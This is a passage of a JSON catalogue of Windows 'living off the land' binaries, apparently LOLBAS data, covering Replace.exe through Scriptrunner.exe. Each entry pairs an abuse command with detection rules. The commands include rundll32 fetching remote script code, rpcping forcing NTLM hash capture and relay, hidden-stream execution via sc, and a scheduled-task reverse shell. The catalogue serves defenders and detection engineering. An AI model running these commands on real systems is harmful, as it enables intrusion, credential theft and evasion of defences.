server"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"}],"references":["https://twitter.com/elceef/status/986334113941655553","https://twitter.com/elceef/status/986842299861782529","https://lolbas-project.github.io/lolbas/Binaries/Replace/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:replace-exe:1","toolId":"lolbas:replace-exe","toolName":"Replace.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"replace.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:folder} /A","description":"Download/Copy executable to specified folder","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\replace.exe","C:\\Windows\\SysWOW64\\replace.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Replace.exe retrieving files from remote server"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"}],"references":["https://twitter.com/elceef/status/986334113941655553","https://twitter.com/elceef/status/986842299861782529","https://lolbas-project.github.io/lolbas/Binaries/Replace/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:reset-exe:0","toolId":"lolbas:reset-exe","toolName":"Reset.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"reset.exe session","description":"Once executed, `reset.exe` will execute `rwinsta.exe` in the same folder. Thus, if `reset.exe` is copied to a folder and an arbitrary executable is renamed to `rwinsta.exe`, `reset.exe` will spawn it.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\reset.exe","c:\\windows\\syswow64\\reset.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"reset.exe being executed and executes rwinsta.exe outside of its normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Reset/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rpcping-exe:0","toolId":"lolbas:rpcping-exe","toolName":"Rpcping.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM","description":"Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.","usecase":"Capture credentials on a non-standard port","mitre":["T1003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rpcping.exe","C:\\Windows\\SysWOW64\\rpcping.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml"}],"references":["https://github.com/vysec/RedTips","https://twitter.com/vysecurity/status/974806438316072960","https://twitter.com/vysecurity/status/873181705024266241","https://twitter.com/splinter_code/status/1421144623678988298","https://lolbas-project.github.io/lolbas/Binaries/Rpcping/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rpcping-exe:1","toolId":"lolbas:rpcping-exe","toolName":"Rpcping.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM","description":"Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).","usecase":"Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port","mitre":["T1187"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rpcping.exe","C:\\Windows\\SysWOW64\\rpcping.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml"}],"references":["https://github.com/vysec/RedTips","https://twitter.com/vysecurity/status/974806438316072960","https://twitter.com/vysecurity/status/873181705024266241","https://twitter.com/splinter_code/status/1421144623678988298","https://lolbas-project.github.io/lolbas/Binaries/Rpcping/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rundll32-exe:0","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe {PATH},EntryPoint","description":"First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute.","usecase":"Execute DLL file","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rundll32-exe:1","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe {PATH_SMB:.dll},EntryPoint","description":"Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute.","usecase":"Execute DLL from SMB share.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rundll32-exe:2","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:{REMOTEURL}\")","description":"Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.","usecase":"Execute code from Internet","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rundll32-exe:3","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"rundll32 \"{PATH}:ADSDLL.dll\",DllMain","description":"Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).","usecase":"Execute code from alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rundll32-exe:4","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe -sta {CLSID}","description":"Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.","usecase":"Execute a DLL/EXE COM server payload or ScriptletURL code.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:runexehelper-exe:0","toolId":"lolbas:runexehelper-exe","toolName":"Runexehelper.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"runexehelper.exe {PATH_ABSOLUTE:.exe}","description":"Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.","usecase":"Executes arbitrary code","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\runexehelper.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml"},{"type":"IOC","value":"c:\\windows\\system32\\runexehelper.exe is run"},{"type":"IOC","value":"Existence of runexewithargs_output.txt file"}],"references":["https://twitter.com/0gtweet/status/1206692239839289344","https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:runonce-exe:0","toolId":"lolbas:runonce-exe","toolName":"Runonce.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Runonce.exe /AlternateShellStartup","description":"Executes a Run Once Task that has been configured in the registry.","usecase":"Persistence, bypassing defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\runonce.exe","C:\\Windows\\SysWOW64\\runonce.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/2926e98c5d998706ef7e248a63fb0367c841f685/rules/windows/persistence_run_key_and_startup_broad.toml"},{"type":"IOC","value":"Registy key add - HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\YOURKEY"}],"references":["https://twitter.com/pabraeken/status/990717080805789697","https://cmatskas.com/configure-a-runonce-task-on-windows/","https://lolbas-project.github.io/lolbas/Binaries/Runonce/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:runscripthelper-exe:0","toolId":"lolbas:runscripthelper-exe","toolName":"Runscripthelper.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"runscripthelper.exe surfacecheck \\\\?\\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder}","description":"Execute the PowerShell script with .txt extension","usecase":"Bypass constrained language mode and execute Powershell script","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\\Runscripthelper.exe","C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\\Runscripthelper.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Event ID 4104 - Microsoft-Windows-PowerShell/Operational"},{"type":"IOC","value":"Event ID 400 - Windows PowerShell"}],"references":["https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc","https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:sc-exe:0","toolId":"lolbas:sc-exe","toolName":"Sc.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"sc create evilservice binPath=\"\\\"c:\\\\ADS\\\\file.txt:cmd.exe\\\" /c echo works > \\\"c:\\ADS\\works.txt\\\"\" DisplayName= \"evilservice\" start= auto\\ & sc start evilservice","description":"Creates a new service and executes the file stored in the ADS.","usecase":"Execute binary file hidden inside an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\sc.exe","C:\\Windows\\SysWOW64\\sc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml"},{"type":"IOC","value":"Unexpected service creation"},{"type":"IOC","value":"Unexpected service modification"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Sc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:sc-exe:1","toolId":"lolbas:sc-exe","toolName":"Sc.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"sc config {ExistingServiceName} binPath=\"\\\"c:\\\\ADS\\\\file.txt:cmd.exe\\\" /c echo works > \\\"c:\\ADS\\works.txt\\\"\" & sc start {ExistingServiceName}","description":"Modifies an existing service and executes the file stored in the ADS.","usecase":"Execute binary file hidden inside an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\sc.exe","C:\\Windows\\SysWOW64\\sc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml"},{"type":"IOC","value":"Unexpected service creation"},{"type":"IOC","value":"Unexpected service modification"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Sc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:schtasks-exe:0","toolId":"lolbas:schtasks-exe","toolName":"Schtasks.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"schtasks /create /sc minute /mo 1 /tn \"Reverse shell\" /tr \"{CMD}\"","description":"Create a recurring task to execute every minute.","usecase":"Create a recurring task to keep reverse shell session(s) alive","mitre":["T1053.005"],"privilege":"user","fullPath":["c:\\windows\\system32\\schtasks.exe","c:\\windows\\syswow64\\schtasks.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml"},{"type":"IOC","value":"Suspicious task creation events"}],"references":["https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/","https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:schtasks-exe:1","toolId":"lolbas:schtasks-exe","toolName":"Schtasks.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"schtasks /create /s targetmachine /tn \"MyTask\" /tr \"{CMD}\" /sc daily","description":"Create a scheduled task on a remote computer for persistence/lateral movement","usecase":"Create a remote task to run daily relative to the the time of creation","mitre":["T1053.005"],"privilege":"admin","fullPath":["c:\\windows\\system32\\schtasks.exe","c:\\windows\\syswow64\\schtasks.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml"},{"type":"IOC","value":"Suspicious task creation events"}],"references":["https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/","https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:scp-exe:0","toolId":"lolbas:scp-exe","toolName":"scp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"scp.exe -o ProxyCommand=\"{CMD}\" . localhost:.","description":"Spawns specified command from `scp.exe` -> `ssh.exe`, even if no SSH server is running on localhost (or any other address specified).","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\scp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`scp.exe` executions referencing `ProxyCommand`."}],"references":["https://gtfobins.org/gtfobins/scp/","https://lolbas-project.github.io/lolbas/Binaries/scp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:scp-exe:1","toolId":"lolbas:scp-exe","toolName":"scp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"scp.exe -S \"{CMD}\" . localhost:.","description":"Spawns specified command from `scp.exe` -> `ssh.exe`, even if no SSH server is running on localhost (or any other address specified).","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\scp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`scp.exe` executions referencing `ProxyCommand`."}],"references":["https://gtfobins.org/gtfobins/scp/","https://lolbas-project.github.io/lolbas/Binaries/scp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:scriptrunner-exe:0","toolId":"lolbas:scriptrunner-exe","toolName":"Scriptrunner.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Scriptrunner.exe -appvscript {PATH:.exe}","description":"Executes executable","usecase":"Execute binary through proxy binary to evade defensive counter measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\scriptrunner.exe","C:\\Windows\\SysWOW64\\scriptrunner.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml"},{"type":"IOC","value":"Scriptrunner.exe should not be in use unless App-v is deployed"}],"references":["https://twitter.com/KyleHanslovan/status/914800377580503040","https://twitter.com/NickTyrer/status/914234924655312896","https://github.com/MoooKitty/Code-Execution","https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:scriptrunner-exe:1","toolId":"lolbas:scriptrunner-exe","toolName":"Scriptrunner.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ScriptRunner.exe -appvscript {PATH_SMB:.cmd}","description":"Executes cmd file from remote server","usecase":"Execute binary through proxy binary from external server to evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\scriptrunner.exe","C:\\Windows\\SysWOW64\\scriptrunner.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml"},{"type":"IOC","value":"Scriptrunner.exe should not be in use unless App-v is deployed"}],"references":["https://twitter.com/KyleHanslovan/status/914800377580503040","https://twitter.com/NickTyrer/status/914234924655312896","https://github.com/MoooKitty/Code-Execution","https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 